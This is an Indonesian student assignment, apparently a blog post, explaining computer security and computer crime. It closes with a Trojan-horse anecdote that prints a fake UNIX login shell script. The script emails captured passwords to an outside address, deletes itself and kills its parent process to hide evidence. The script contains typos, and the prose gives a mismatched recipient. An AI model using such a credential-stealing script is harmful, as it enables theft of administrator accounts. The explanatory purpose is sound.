Tugas PTI
Nama : Eka Nurul Sepriana
Kelas : Shift
Jurusan : Sistem Informasi
Semester1
Keamanan
dan kejahatan komputer
Definisi Keamanan Komputer
Keamanan komputer adalah suatu istilah bagaimana komputer dapat terjaga atau terproteksi dari berbagai ancaman serangan dari luar seperti merusak (virus komputer), pencurian data dan sebagainya.
Mengapa Keamanan Komputer dibutuhkan….?
a)
Melindungi system dari kerentanan, kerentanan akan menjadikan system kita
berpotensi untuk memberikan akses yang tidak diizinkan bagi orang lain yang
tidak berhak.
b)
Mengurangi resiko ancaman, hal ini biasa berlaku di institusi dan perusahaan
swasta.
c)
Melindungi system dari gangguan alam seperti petir dan lain-lainnya.
Kejahatan komputer
Kejahatan Komputer adalah perbuatan melawan hukum yang
dilakukan memakai komputer sebagai sarana/alat atau komputer sebagai objek,
baik untuk memperoleh keuntungan ataupun tidak, dengan merugikan pihak lain.
Kejahatan komputer meningkat karena
:
a)
Meningkatnya kemampuan pengguna komputer dan internet
b)
Desentralisasi server sehingga lebih banyak system yang harus ditangani,
sementara SDM terbatas
c)
Kurangnya hukum yang mengatur kejahatan komputer.
d)
Semakin banyaknya perusahaan yang menghubungkan jaringan LAN mereka ke
Internet.
e)
Meningkatnya aplikasi bisnis yang menggunakan internet.
Adapun beberapa bentuk
kejahatan nya di klarifikasikan sebgai berikut :
- Illegal Access / Akses Tanpa Ijin ke Sistem Komputer
- Illegal Contents / Konten Tidak Sah
- Data Forgery / Pemalsuan Data
- Spionase Cyber / Mata-mata
- Data Theft /Mencuri Data
- Misuse of devices / Menyalahgunakan Peralatan Komputer
Contoh kejahatan komputer
1. Pencurian uang
2. Virus computer
3. Layanan pencurian
4. Pencurian data dalam program
5. Memperbanyak program
6. Mengubah data
7. Pengrusakan program
8. Pengrusakan data
2. Virus computer
3. Layanan pencurian
4. Pencurian data dalam program
5. Memperbanyak program
6. Mengubah data
7. Pengrusakan program
8. Pengrusakan data
Contoh aplikasi kejahatan komputer:
- Hacker
Hacker adalah sekelompok orang yang
menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan
memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer
ataupun dalam sebuah software. Ada juga yang bilang hacker adalah orang yang
secara diam-diam mempelajari sistem yang biasanya sukar dimengerti untuk
kemudian mengelolanya dan men-share hasil ujicoba yang dilakukannya. Hacker
tidak merusak sistem.
- Cracker
Cracker adalah sebutan untuk orang yang mencari kelemahan system dan memasukinya untuk kepentingan pribadi dan mencari keuntungan dari system yang di masuki seperti: pencurian data, penghapusan, dan banyak yang lainnya. Penyebab cracker melakukan penyerangan diantaranya karena kecewa atau sakit hati, balas dendam, petualangan, mencari keuntungan, dsb.
- Spyware
Spyware merupakan software yang
mengumpulkan informasi secara sembunyi-sembunyi melalui koneksi internet tanpa
sepengetahuan pengguna komputer, umumnya untuk tujuan iklan. Aplikasi spyware
seringkali dipaketkan sebagai komponen tersembunyi pada program freeware
(gratis) atau shareware yang dapat didownload melalui internet.
- SPAM
Spam tidak diinginkan oleh pengguna
fasilitas komputer dalam bentuk surat elektronik (email), Instant Messaging,
Usenet, newsgroup, blog, dll. SPAM tidak diinginkan oleh pengguna komputer
karena SPAM biasanya berisi iklan dari perusahaan yang mengakibatkan ketidaknyamanan
bagi para pengguna web. Biasanya, SPAM akan dirasa mengganggu apabila jumlah
email atau lainnya dikirim dalam jumlah yang banyak / besar.
MEMAHAMI
HACKER BEKERJA
Secara umum melalui tahapan-tahapan
sebagai berikut :
1.
Tahap mencari tahu system komputer
sasaran.
2.
Tahap penyusupan
3.
Tahap penjelajahan
4.
Tahap keluar dan menghilangkan
jejak.
Contoh kejahatan kasus Trojan House,
memanfaatkan SHELL script UNIX :
Seorang gadis cantik dan genit
peserta kuliah UNIX di sebuah perguruan tinggi memiliki potensi memancing
pengelola sistem komputer (administrator pemegang account root . . .) yang
lengah. Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX yang
diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja
dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX.
"Well, ini soal kecil. Mungkin
password kamu ke blokir, biar saya perbaiki dari tempat kamu", ujar
administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit
peserta kuliah tersebut.
Keesokan harinya, terjadilah
kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk
juga hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya
masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa
homepage mereka dijebol oleh hacker dari Luar Negeri . . . .
Sederhana, gadis cantik dan genit
peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk
shell script yang menyerupai layar login dan password sistem UNIX sebagai
berikut:
#!/bin/sh
###################################
# Nama program :
my_login
# Deskripsi :Program
kuda trojan sederhana
# versi 1.0 Nopember
1999
####################################
COUNTER=0
Cat /etc/issue
While [
"$COUNTER" –ne 2 ]
do
let
COUNTER=$COIUNTER+1
echo "login:
\c"
read LOGIN
stty echo
echo "password:
\c"
read PASSWORD
echo "User $LOGIN
: $PASSWORD" | mail gadis@company.com
stty echo
echo
echo "Login
Incorrect"
done
rm $0
kill –9 $PPID
Apabila
program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal
penggunaan komputer pdaa sistem UNIX:
Login:
Password:
Lihatlah,
Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan
program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login
ini tidak terlihat beda dibanding layar login sesungguhnya.
Seperti pada program login
sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam sistem.
Setelah diisi password dan di enter,maka segera timbul pesan
Login:root
Password: ********
Login Incorrect
Tentu saja
Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah) salah.
Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba
login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar UNIX.
Perhatikan program di atas
baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada
layar di atas, setelah itu maka otomatis data login dan password tersebut akan
di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit telah
mendapatkan login dan password . . . ia ternyata seorang hacker !!
Walaupun sederhana, jika kita perhatikan
lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya,
yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di
atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di
atas, yaitu
rm $0
kill –9 $PPID
yang artinya
akan segera dilakukan proses penghapusan program my_login dan hapus pula ID
dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga
menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di
dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata
seorang gadis peserta kuliahnya.
Sukses dari program ini sebenarnya
sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root.
Hacker yang baik memang harus berusaha memancing agar pemilik root menjalankan
program ini.
Tidak ada komentar:
Posting Komentar